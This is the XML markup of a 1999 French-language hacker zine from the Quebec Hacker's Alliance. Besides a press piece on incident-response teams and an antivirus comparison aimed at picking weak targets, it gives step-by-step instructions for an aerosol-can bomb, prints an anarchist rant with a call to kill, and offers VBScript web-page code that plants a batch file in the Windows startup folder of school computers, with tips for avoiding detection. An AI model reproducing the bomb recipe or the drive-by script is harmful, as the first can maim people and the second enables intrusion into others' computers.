        <w:t>La création du premier Samu de la sécurité informatique remonte à décembre 1988, à l'université de Carnegie Mellon (Pittsburgh), à la demande de la Darpa, l'agence de recherche et développement du département de la Défense américain. Il y avait urgence: un virus lâché par l'étudiant Robert Morris le mois précédent venait de paralyser plus de 10 % des ordinateurs connectés à l'Internet. Depuis, c'est l'explosion. En France, une équipe de technopompiers destinée à secourir les administrations et les ministères devrait voir le jour avant la fin de l'année. L'organisme sera piloté par le Service central de la sécurité des systèmes d'information (SCSSI), aux ordres de Matignon.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Coopération. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Au total, la planète compte près de 80 équipes, fédérées au sein du First (Forum of Incident Response and Security Teams), basé aux Etats-Unis. Cet organisme est chargé d'assurer la coopération des différents Cert en cas de pépin d'ampleur. Ainsi, en mars, quand le virus Melissa a déferlé sur l'Internet, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>«une conférence téléphonique avec plusieurs dizaines de personnes de toute la planète a eu lieu»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>, raconte David Crochemore. Des Asiatiques, victimes du décalage horaire, ont dû se relever en pleine nuit pour le briefing. Une procédure d'urgence, mais encore un peu poussive: lorsque les Cert ont enfin délivré le moyen de lutter contre Melissa, le virus avait déjà fait le tour de la planèt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Pompier du Net, un métier d'avenir? Selon le général Jean-Louis Desvignes, le patron du SCSSI, c'est certain. Pressés par une concurrence très forte, les éditeurs de logiciels ne cessent de sortir de nouvelles versions de leurs produits, souvent sans prendre le temps de vérifier si des failles de sécurité subsistent. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>«On vous annonce une nouvelle version alors que la précédente est encore pleine de bugs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, s'agace-t-il. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Et l'Internet augmente la vulnérabilité des ordinateurs.»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Un bonheur pour les pirates, toujours prêts à se faufiler dans le moindre interstice. Et de nouveaux incendies en prévision.</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u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Antivirus:</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Posséder un anti-virus c'est bien, savoir lequel choisir c'est mieux. Les antivirus détectent évidemment foule de virus, avec une base de données remises à jour chaque semaine. Des gens sont payés pour trouver des virus. Le plus connu des Anti-Virus est Norton Anti-Virus, mais est-il réellement effic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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Oui il l'est mais dans des proportions non effarantes. Sur 700 fichiers de scannés Norton n'a trouvé que 200 virus sur les 400 mis à disposition. De plus Norton scann tout ce qui est cracker (multiicq par exemple), ou bien des programmes comme la partie client de BO2K qui, jusqu'à nouvel ordre, n'est pas infecté par un trojan.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> De plus Norton peut vous donner la description de certains virus/troyans: bien vague... Alors que Norton fait une description de Netbus 1.7 (serveur) il n'en fait pas pour la 2.0: quand on sait que la deuxième est la plus dangere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 je devais vous conseiller un Anti-Virus je devrais vous conseiller AVP (Anti Viral Toolkit pro), il détecte 20% de plus de virus (sans rajouter n'importe quoi) que NA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non voici un comparatif d'antivir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SYMANTEC NORTON ANTIVIRUS FOR FIREWALLS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les virus sur le: HTTP, SMTP, FTP.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recherche pas de magouilles sur les Applets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ait recherche les certificats (intéressant)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recherche pas de signatures (intéressant)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recherche pas les sources (intéressant)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iltre pas les E-mails (intéressant)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ait pas de gestionnaire de délivrance de courrier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Pas d'OPSEC Compliant (NT)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Pas d'OPSEC Compliant (UNIX)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ait pas de filtrage d'adresses url (intéressant)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ait pas de filtrage de spamming (haha!)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Il ne bloque pas les cookies (intéressant)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Les algorithmes de compression supportés: ARJ, ZIP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détecte pas l'e-mail spoofing (intéressant) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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TREND INTERSCAN VIRUS WALL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les virus sur le: HTTP, SMTP, FTP.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les magouilles sur les Applet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les certificat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de signature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Recherche pas les source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Filtre les E-mail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Fait un gestionnaire de délivrance de courrier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OPSEC Compliant (NT)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OPSEC Compliant (UNIX)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fait pas de filtrage d'adresses url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Fait du filtrage de spamming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Il ne bloque pas les cookie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Les algorithmes de compression supportés: 19 type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lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Ne détecte pas l'e-mail spoofing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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Ainsi on peut voir que TREND INTERSCAN VIRUS WALL est très fiable (plus que NORTON). Mais si cette liste est là c'est pour une raison: les réseaux utilisent toujours ces deux là (en général, attention!), pour se sécuriser. Donc il est possible d'étudier ce que fait et ne fait pas chacun de ces utilitaires, pour mieux se renseigner sur la cible! Un réseau n'utilisant que NORTON, ne sera pas assez sécurisé et présentera donc des failles (pas de filtrages mails par exempl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Conclusion:</w:t>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b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Ton exploit !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tu as gagné</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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Tu as accédé à un système, tu n'y as rien détruit. T'es un seigneur. un emprisonnement de deux mois à un an et une amende de 2.000 Frs à 50.000 Frs ou l'une de ces deux peine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u as en plus modifié des infos ! Top bravo ! l'emprisonnement sera de deux mois à deux ans et l'amende de 10.000 Frs à 100.000 Fr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u as niqué le système. Ce fainéant d'admin va avoir du boulot pour 3 jours. T'es un Lordz ! un emprisonnement de trois mois à trois ans et une amende de 10.000 Frs à 100.00 Frs ou l'une de ces deux peine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u y as laissé un bon gros trojan ! Encore mieux. un emprisonnement de trois mois à trois ans et une amende de 2.000 Frs à 500.000 Frs ou une de ces deux peine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t en partant, tu as changé les mots de passe ! Super cool ! un emprisonnement d'un an à cinq ans et une amende de 20.000 Frs à 2.000.000 Fr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u es revenu en utilisant ces mots de passe changés. T'es un malin, toi ! un emprisonnement d'un an à cinq ans et une amende de 20.000 Frs à 2.000.000 Frs ou une de ces deux peines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as de chance, tu as essayé de pénétrer dans le système, mais ça n'a pas marché. Tu as quand même droit à un lot de consolation. La même chose que si tu avais réussi ! Au grand jeu du hacking on gagne à tous les coups ! </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Tu fais partie d'un groupe de rebelz, tu n'as pas hacké, mais tu en as discuté avec tes potes rebelz. Allez, on va dire que tu as aussi gagné On t'offre les peines prévues pour l'infraction elle-même ou pour l'infraction la plus sévèrement réprimé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000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>profites-en ! Petit veinard !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>(Zipiz RuL3z!)</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color w:val="000080"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Auteur de l'article: Clad Strif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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Article original pour IG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Regles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Tous ces défoncés qui se rendent aux suprêmes-parties. Tous ces tarés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rient: ANARCHY! ANARCHY! Tous ces mecs que le crack et le shit font march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ous ces illuminés qui ne pensent qu'à pouvoir vivre, survivre dans notre monde, dans le leu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ous enculons les salopards hypocrites et dégénérés, les snobs et bourg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ous ces enfoirés qui croient nous dresser à la baguette. Nous remettons en</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ause votre religion de petits citoyens, vos bonnes manières, nous penso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ifféremm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cceptez que c'est nous qui allons plus tard vous payer, que nous allo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onstruire l'avenir sur un passé beaucoup trop sale, que des fils de put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trainent leur merde NOIRE de petit racistes, et que VOUS n'attendez qu'u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hose, que ça boug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s putains de conneries de rumeurs que nous aimerions faire taire, c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llusions bizarres au journal télévisé sur TF1 de suspects magrébains, ce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lics assez cons pour vérifier les papiers d'identité du pauvre Mohamed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n'a jamais rien fai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vous n'accpeter pas cet état de fait, pourquoi ne pas buter les enfants d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alauds qui cherchent à diriger notre monde par les seuls mots xénophobes qu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ur sortent de la bouche, par leur irrespect et leur démagogie flagrant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qui suivez comme des moutons bâtards ce qu'on vous raconte, vous qui gob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e que le journaliste chie sur un papier pour son rédacteur en chef: ALL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FAIRE FOUTR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Remettez en cause l'ordre social de cette hiérarchie cachée, sensuré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mniprésente, aux pourtours d'or mais gangrennée par la peste, investi pa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des mecs avide de fric: ces être galeux qui profitent de vou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aites bouger votre monde, vous êtes leur avenir, mais ils ne s'en renden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as encore compte ces mecs qui augmentent les impots. ENVOYER LES CHIER eux</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qui dépensent 1 milliard de francs pour sonder Mars et qui laissent des gen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crever de faim dans la r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i tout le monde bouge, le monde bougera: agissez.</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7 décembre 1999, auteur anonym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nclus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_________________________________</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                                                                        &l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               !!!=- ANARCHY -=!!!                   &l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  ---------------------------------------------------  &l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                  Bombe aérosol                            &l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  ---------------------------------------------------  &l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            Par |Wu-TaNG| et WeEdMaN        &l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gt;_______________________________&l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Faites pas trop de conneries avec ça parce que ca pette en ostie! Assez pour perdre un membre faque on déconne pas ok? he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ATO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1 -= Une bouteille aérosole contenat un liquide hautement inflammab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2 -= Une mèche ou un des essuie-tou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3 -= Un  peu de diésel ou de gaz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4 -= Un objet pointu (comme un clou)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5 -= Des criss de bonnes jambes pour courrir pis vous cacher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éparation de la bouteill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hémat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 &lt;------------- Boutte qu'on pèse dessu pour faire sortir le liquide (à enlever)</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___|__|___</w:t>
        <w:tab/>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 xml:space="preserve"> /</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w:t>
        <w:tab/>
        <w:t xml:space="preserv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b/>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s étoiles veulent dirent qu'on se calis du bas du shéma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Vous devez enlevez le bouton pour ne laisser qu'un petit trou. Vous devez l'agrandir avec votre objet pointu pour pouvoir laisser passer une mèche quelconqu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éparation de la mèch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endre du papier essuie-tout (style bounce) et le tremper dans du gaz (de préférence du diésel parce que ca brûle pis en cr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Préparation de la bombe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n pour cette partie la faitent attention parce que c'est la plus dangereuse. Faudrait pas que ca vous pette den mains pis que vous finissiez manchots... heh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Bourrer le petit troue avec votre mèche à l'aide, au besoin, du clou.</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llumer la mèche pis sacrer le camp au plus criss!</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musez vous bien! hahaha</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r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Comment introduire un fichier dans le systeme, Par |Wu-TaNG| et WeEdMaN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t xml:space="preserve">  |</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___________________________________________</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gt;                                                                                               &l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gt;Cet arcticle a été écrit pour des utilisateur moyen     &l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gt;          et non pour des Hacker élites                                &lt;</w:t>
        <w:tab/>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gt;  --------------------------------------------------------------------  &l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gt;   Comment introduire un fichier dans le systeme        &l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gt;           informatique de votre école                                  &l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gt;  --------------------------------------------------------------------  &l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gt;            Par |Wu-TaNG| et WeEdMaN                              &l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gt;_________________________________________&l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Salut tout les hackers en herbe du KEBAK!!! &lt;==== Québec en Jouale</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Bon vous rêvez de foutre le bordel dans le systeme informatique de votre école mais vous savez pas commen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Solution: lire notre arcticle</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MATOS</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1 -= Internet Explorer ( merci BILLOU!!! ) à l'école =-</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2 -= Le notepad ( blocnote ) chez vous =-</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3 -= Votre putain de tête =-</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Premièrement vous aurez peut-être besoin d'une base en VBScript pour bien comprendre le code qui vous sera listé plus bas et peut-être aussi une base en Batch.</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Vous aurez besoin d'un acount sur Geocities ou Xoom.com ou l'équivalent (spoofez-vous ou créez la d'une autre machine que la votre pour éviter toute trace de votre hack)</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Deuxièment glisser le code suivant dans votre page Web:</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lt;html&gt;&lt;body&g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lt;script Language="VBScript"&g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if location.protocol = "file:" then</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Set FSO = CreateObject("Scripting.FileSystemObjec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HPath = Replace(location.href, "/", "\")</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HPath = Replace(HPath, "file:\\\", "")</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HPath = FSO.GetParentFolderName(HPath)</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Set TRange = document.body.createTextRange</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Set BatFile = FSO.CreateTextFile("c:\Windows\Virus.bat", 2, False) </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BatFile.WriteLine "@echo off"</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ab/>
        <w:t>BatFile.WriteLine "echo"</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ab/>
        <w:t>BatFile.WriteLine "echo Les admins sux" &lt;--tous les lignes modifiables a souhait hehe</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BatFile.WriteLine "pause"</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ab/>
        <w:t>BatFile.WriteLine "echo HAHAHA"</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BatFile.Close</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end if</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lt;/script&g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lt;/body&g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lt;/html&g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Ceci créera un Virus.bat dans c:\Windows\ contenant les lignes "echo Les admins sux" </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et "echo HAHAHA"</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Résultat a l'écran :</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Microsoft(R) Windows 98</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C)Copyright Microsoft Corp 1981-1998.</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c:\windows&gt;virus</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Les admins sux</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Appuyez sur une touche pour continuer . . .</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HAHAHA</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c:\windows&g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Mettez ceci dans votre Page Web mine de rien et visitez la en acceptant le VBScrip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Bon maintenant que notre fichier bat à été introduit il suffit de ne pas se faire griller... Changez le path pour c:\windows\menu démarer\programmes\Démarrage\Virus.bat. Le virus ne prendra effet qu'au prochain démarrage ce qui signifie qu'un autre laid se fera prendre a votre place. hahaha que nous sommes Diaboliques!!!</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 xml:space="preserve">               </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>--------------------------------------</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t>Bon et bien amusez vous bien avec les ordis de votre école... hehe A noter que ceci fonctionne avec n'importe quel réseau ou ordinateurs possédant Internet Explorer mais c'est crissement plus drôle a l'école! hahaha</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>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spacing w:lineRule="auto" w:line="240"/>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spacing w:lineRule="auto" w:line="240"/>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spacing w:lineRule="auto" w:line="240"/>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spacing w:lineRule="auto" w:line="240"/>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spacing w:lineRule="auto" w:line="240"/>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Conclusion  |</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>o=-------------=o</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xml:space="preserve">____    __  __    __           ____   __  __   __    ______ ____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__/ __ \_ / / / /__/   |      ___/ __ \_/ / / /_ / /___/ ____//_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xml:space="preserve">_  / / /_/ /_/ /__/ /| |      __/ /_/ /  / / /_ / / __/ /_   __/ /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_/ /_/ __  / _/ ___ |      _/ _, _// /_/ / _/ /___/ /___  _/ /__</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___\_\/_/ /_/  /_/  |_|      /_/ |_| \____/  /_____/_____/  /____/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-CA"/>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Merci d'avoir lu le</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zine #10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t xml:space="preserve">des </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>Quebec Hacker's Allianc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Le Zine #11 devrais suivre assez bientot! :) Garder un oeil</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sur nous pour plus de nouvelles... Allez sur #QHA (undernet)</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ou sur www.qharulez.com comme vous preféré :) Merci!</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A la prochaine!!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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_____________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:lang w:val="en-CA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>|QHA, Québec Hacker's Alliance - http//www.qharulez.com  |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|                                         |</w:t>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       ________                 __                 __         __________           |</w:t>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    /QQQQQQQQ\         |HH|            |HH|      /AAAAAAAA\      |</w:t>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    |QQ| ¯¯¯¯¯ |QQ|       |HH|            |HH|     |AA|¯¯¯¯¯¯|AA|     |</w:t>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    |QQ|              |QQ|     |HH|______|HH|     |AA|______|AA|     |</w:t>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    |QQ|            _|QQ|     |HHHHHHHHH|    |AAAAAAAAA|    |</w:t>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    |QQ|        |QQQQ|     |HHHHHHHHH|    |AAAAAAAAA|    |</w:t>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    |QQ|__   |QQQQ|      |HH|¯¯¯¯¯¯|HH|     |AA|¯¯¯¯¯¯ |AA|    |</w:t>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    \QQQQQQQQQ\      |HH|            |HH|     |AA\             /AA|    |</w:t>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     ¯¯¯¯¯¯¯¯ |QQQ|      |HH|            |HH|     |AAA|       |AAA|    |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>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                          ¯¯¯       ¯¯                  ¯¯        ¯¯¯¯          ¯¯¯¯      |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">                               "We Are Everywhere"                                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|----------------------------------------------------------------------|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000080"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>|   Quebec Hacker's Alliance Rulez!!      |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-1352" w:hanging="0"/>
        <w:rPr>
